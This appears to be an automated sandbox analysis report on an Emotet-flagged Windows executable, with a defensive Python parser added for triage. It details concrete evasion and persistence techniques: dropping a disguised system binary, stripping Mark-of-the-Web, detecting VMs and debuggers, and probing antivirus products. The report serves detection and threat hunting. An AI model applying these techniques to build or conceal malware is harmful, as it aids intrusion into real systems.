Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs lHuFdWpoMA.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: classification engine Classification label: mal80.troj.evad.winEXE@18/8@0/7
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle, 0_2_02BB8CA0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification, 3_2_00FB4FD0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5390 ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1528:120:WilError_01
Source: lHuFdWpoMA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: lHuFdWpoMA.exe Metadefender: Detection: 48%
Source: lHuFdWpoMA.exe ReversingLabs: Detection: 72%
Source: unknown Process created: C:\Users\user\Desktop\lHuFdWpoMA.exe 'C:\Users\user\Desktop\lHuFdWpoMA.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61B0 push ecx; mov dword ptr [esp], 000003A6h 0_2_02BB61B1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62A0 push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02BB62A1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6090 push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02BB6091
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6180 push ecx; mov dword ptr [esp], 0000D106h 0_2_02BB6181
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB60F0 push ecx; mov dword ptr [esp], 0000A172h 0_2_02BB60F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62D0 push ecx; mov dword ptr [esp], 00001969h 0_2_02BB62D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61D0 push ecx; mov dword ptr [esp], 00004B56h 0_2_02BB61D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6320 push ecx; mov dword ptr [esp], 00009128h 0_2_02BB6321
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6220 push ecx; mov dword ptr [esp], 00004B50h 0_2_02BB6221
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6240 push ecx; mov dword ptr [esp], 00008F23h 0_2_02BB6241
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6140 push ecx; mov dword ptr [esp], 00004AF2h 0_2_02BB6141
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h 0_2_02A17EBF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02A17E3F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h 0_2_02A17E6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A28B8F push edi; iretd 0_2_02A28BA1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A33FD9 push ss; iretd 0_2_02A33FDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h 0_2_02A17C8F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push ebx; iretd 0_2_02A344AF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push FFFFFF95h; iretd 0_2_02A344F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h 0_2_02A17CDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02A17C2F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h 0_2_02A17DBF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h 0_2_02A17DDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h 0_2_02A17D1F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h 0_2_02A17D6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h 0_2_02A17D4F
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB60F0 push ecx; mov dword ptr [esp], 0000A172h 3_2_00FB60F1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB62D0 push ecx; mov dword ptr [esp], 00001969h 3_2_00FB62D1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB61D0 push ecx; mov dword ptr [esp], 00004B56h 3_2_00FB61D1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB61B0 push ecx; mov dword ptr [esp], 000003A6h 3_2_00FB61B1
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB62A0 push ecx; mov dword ptr [esp], 0000BFAAh 3_2_00FB62A1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Executable created and started: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Drops PE files to the windows directory (C:\Windows)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe PE file moved: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
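
The lines in the System Summary, Persistence and Installation Behavior, and Hooking sections above share one shape, "Source: <process> <event>: <detail>", and together they describe the part of this run that matters for hunting: the sample moves itself into C:\Windows\SysWOW64\msaatext\ as powercpl.exe, strips that file's Zone.Identifier stream (the Mark-of-the-Web that SmartScreen and Office Protected View key on), and starts it. The Python below is an added example, not part of this report: a parser for those lines that produces a parent/child process tree, the list of PE files dropped under C:\Windows, and the files whose Mark-of-the-Web was removed. The input is a constructed excerpt copied from the sections above; the parent/child relationship assumes, as the report's own lines do, that the Source of a "Process created" line is the parent.

```python
"""
Added example (not from the sandbox report): parse the
"Source: <process> <event>: <detail>" signature lines into a triage summary.
REPORT_EXCERPT is a constructed excerpt copied from the report's own lines.
"""
from __future__ import annotations

import re
from collections import defaultdict

REPORT_EXCERPT = r"""
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File created: C:\Windows\SysWOW64\msaatext\ Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File deleted: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\lHuFdWpoMA.exe 'C:\Users\user\Desktop\lHuFdWpoMA.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe PE file moved: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Executable created and started: C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
"""

# One signature line; the trailing "Jump to behavior" is page navigation, not data.
LINE_RE = re.compile(
    r"^Source: (?P<source>.+?) "
    r"(?P<event>File created|File deleted|Process created|PE file moved|"
    r"Executable created and started): "
    r"(?P<detail>.+?)(?: Jump to behavior)?$"
)
# "Process created" detail is "<image path> <command line>"; image paths may
# contain spaces, so split at the first ".exe" followed by a space.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?: (?P<cmdline>.*))?$", re.IGNORECASE)
STREAM = ":Zone.Identifier"


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def parse_report(text: str) -> list:
    """Return one dict per recognised line; other signature lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        if ev["event"] == "Process created":
            im = IMAGE_RE.match(ev["detail"])
            ev["image"] = im.group("image")
            ev["cmdline"] = im.group("cmdline") or ""
        events.append(ev)
    return events


def process_tree(events: list) -> dict:
    """Parent image name -> sorted child image names. Lines whose Source is
    'unknown' carry no parent and are left out."""
    tree = defaultdict(set)
    for ev in events:
        if ev["event"] == "Process created" and ev["source"] != "unknown":
            tree[basename(ev["source"])].add(basename(ev["image"]))
    return {parent: sorted(children) for parent, children in tree.items()}


def dropped_executables(events: list) -> list:
    """PE files the sample placed under C:\\Windows and then launched."""
    paths = {ev["detail"] for ev in events
             if ev["event"] in ("PE file moved", "Executable created and started")
             and ev["detail"].lower().startswith("c:\\windows\\")}
    return sorted(paths)


def motw_removals(events: list) -> list:
    """Files whose Zone.Identifier stream was deleted (Mark-of-the-Web removed)."""
    return sorted(ev["detail"][: -len(STREAM)] for ev in events
                  if ev["event"] == "File deleted" and ev["detail"].endswith(STREAM))


def triage(text: str) -> dict:
    events = parse_report(text)
    return {
        "process_tree": process_tree(events),
        "dropped_executables": dropped_executables(events),
        "motw_removed": motw_removals(events),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(REPORT_EXCERPT), indent=2))
```

The three outputs map directly onto host hunting: a user-launched executable spawning a child from a freshly created subdirectory of SysWOW64 with a system-sounding name, a PE file appearing under C:\Windows, and a Zone.Identifier stream deleted from that same file. Note that the report shows the stream deletion on the dropped copy, not on the original download, so an EDR rule that only watches the Downloads folder would miss it.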

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains functionality to enumerate running services
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\svchost.exe TID: 1056 Thread sleep time: -30000s >= -30000s Jump to behavior
Queries disk information (often used to detect virtual machines)
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 0_2_02BB3A20
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3A20 _snwprintf,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,_snwprintf,HeapFree,FindClose, 3_2_00FB3A20
Source: svchost.exe, 00000005.00000002.485635855.000002062F865000.00000004.00000001.sdmp Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000008.00000002.481907201.00000200AC202000.00000004.00000001.sdmp Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: powercpl.exe, 00000003.00000002.483651764.0000000002B74000.00000004.00000001.sdmp, svchost.exe, 00000005.00000002.485482257.000002062F84E000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.476544634.0000020902829000.00000004.00000001.sdmp Binary or memory string: hgFs f
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 00000008.00000002.482016332.00000200AC240000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.482207926.000001F61A43E000.00000004.00000001.sdmp, svchost.exe, 0000000B.00000002.482632985.00000170D5E2A000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000006.00000002.277289531.000001ABBA340000.00000002.00000001.sdmp, svchost.exe, 00000007.00000002.293337185.0000021B02940000.00000002.00000001.sdmp, svchost.exe, 00000009.00000002.483594205.000001F61B140000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 mov eax, dword ptr fs:[00000030h] 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5140 mov eax, dword ptr fs:[00000030h] 0_2_02BB5140
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A16CDE mov eax, dword ptr fs:[00000030h] 0_2_02A16CDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A10456 mov eax, dword ptr fs:[00000030h] 0_2_02A10456
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E mov eax, dword ptr fs:[00000030h] 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1095E mov eax, dword ptr fs:[00000030h] 0_2_02A1095E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 mov eax, dword ptr fs:[00000030h] 0_2_02B71030
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4190 mov eax, dword ptr fs:[00000030h] 3_2_00FB4190
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB5140 mov eax, dword ptr fs:[00000030h] 3_2_00FB5140
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E06CDE mov eax, dword ptr fs:[00000030h] 3_2_00E06CDE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E00456 mov eax, dword ptr fs:[00000030h] 3_2_00E00456
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0095E mov eax, dword ptr fs:[00000030h] 3_2_00E0095E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D2E mov eax, dword ptr fs:[00000030h] 3_2_00E05D2E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00F71030 mov eax, dword ptr fs:[00000030h] 3_2_00F71030
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progman
Source: powercpl.exe, 00000003.00000002.483392490.00000000015D0000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.482915686.000001451EF90000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB5720 RtlGetVersion,GetNativeSystemInfo,GetNativeSystemInfo, 3_2_00FB5720
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000E.00000002.482385045.00000260AE240000.00000004.00000001.sdmp Binary or memory string: (@\REGISTRY\USER\S-1-5-19ws Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.482538089.00000260AE302000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match File source: 00000003.00000002.482882849.0000000000FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482751188.0000000000F74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220540137.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482632902.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220611938.0000000002BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220584249.0000000002B74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.powercpl.exe.fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lHuFdWpoMA.exe.2bb0000.1.unpack, type: UNPACKEDPE